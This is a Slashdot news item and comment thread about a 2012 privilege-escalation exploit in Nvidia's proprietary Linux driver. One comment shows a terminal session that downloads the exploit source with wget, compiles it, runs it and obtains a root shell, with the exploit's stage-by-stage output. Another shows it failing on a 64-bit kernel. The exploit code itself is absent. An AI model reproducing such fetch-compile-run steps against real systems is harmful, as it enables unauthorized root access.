
Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

Posted by Unknown Lamer
from the rms-gazes-upon-you-smugly dept.
An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to Nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Airlie, a well-known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.
  • Re:A view to a kill. (Score:5, Informative)

    by greg1104 (461138) <gsmith@gregsmith.com> on Wednesday August 01, 2012 @01:42PM (#40845101) Homepage

    VGA maps the video card's memory [osdever.net] into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by wanting to retain compatibility with older video standards (CGA, EGA).

  • works here (Score:5, Informative)

    by Anonymous Coward on Wednesday August 01, 2012 @01:50PM (#40845239)

    It's certainly legit..

    c@v:~$
    c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
    2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
    c@v:~$ mv 86747-001.bin nvid-root.c
    c@v:~$ gcc nvid-root.c -o nvid-root
    c@v:~$ ./nvid-root
    [*] IDT offset at 0xc1808000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 32-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xc18086e0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    [*] Hiding evidence...
    [*] Have root, will travel..
    sh-4.2#
    sh-4.2#

    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
    sh-4.2#

    sh-4.2# lsb_release -a
    LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
    Distributor ID: Ubuntu
    Description: Ubuntu 12.04 LTS
    Release: 12.04
    Codename: precise

    sh-4.2# uname -a
    Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
    sh-4.2#

  • by nedlohs (1335013) on Wednesday August 01, 2012 @01:51PM (#40845255)

    Yeah you don't get more flimsy evidence than a working exploit.

  • Re:works here (Score:5, Informative)

    by dmitrygr (736758) <dmitrygr@gmail.com> on Wednesday August 01, 2012 @02:14PM (#40845707) Homepage

    64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

    [*] IDT offset at 0xffffffff81b60000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 64-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xffffffff81b60dc0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    [*] Hiding evidence...
    callsetroot returned fffffffffffffffe (-2)
    [*] Failed to get root.

  • Re:A view to a kill. (Score:3, Informative)

    by Desler (1608317) on Wednesday August 01, 2012 @02:17PM (#40845759)

    Windows 7 still includes a VGA video driver.

  • by Jerry Atrick (2461566) on Wednesday August 01, 2012 @02:37PM (#40846071)

    Frankly a root exploit is one of their lesser sins.

    Then their cardinal sins must be Hitlerian: (from David Airlie's write-up)

    You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

    First they spent months claiming there was no bug.
    Then they spent months claiming they'd fixed it (they hadn't).
    Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

    Over a year of data loss for anyone that believed them.

    Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.

  • by RedDeadThumb (1826340) on Wednesday August 01, 2012 @04:24PM (#40847675)

    Amen! I had a hell of a time trying to report a bug in the ATI driver as well. And how do you report a bug to Netflix? All company web front pages should have a big button that says "report bug". People are out here doing free QA for them and they aren't taking advantage. Plus I actually get pissed when I cannot report a bug. And I know I am not alone here, so it is bad PR.
  • by Carewolf (581105) on Wednesday August 01, 2012 @05:22PM (#40848465) Homepage

    I think they might have a culture of not listening. The chief maintainer of Nvidia's official forums posted, after Linus' outburst, a series of posts about how Linus' complaints had caused "him and his family severe grief", that Linus should shut up and would not be welcome on the forum, and that anybody talking about his comments would be banned.

    Jesus Christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia?
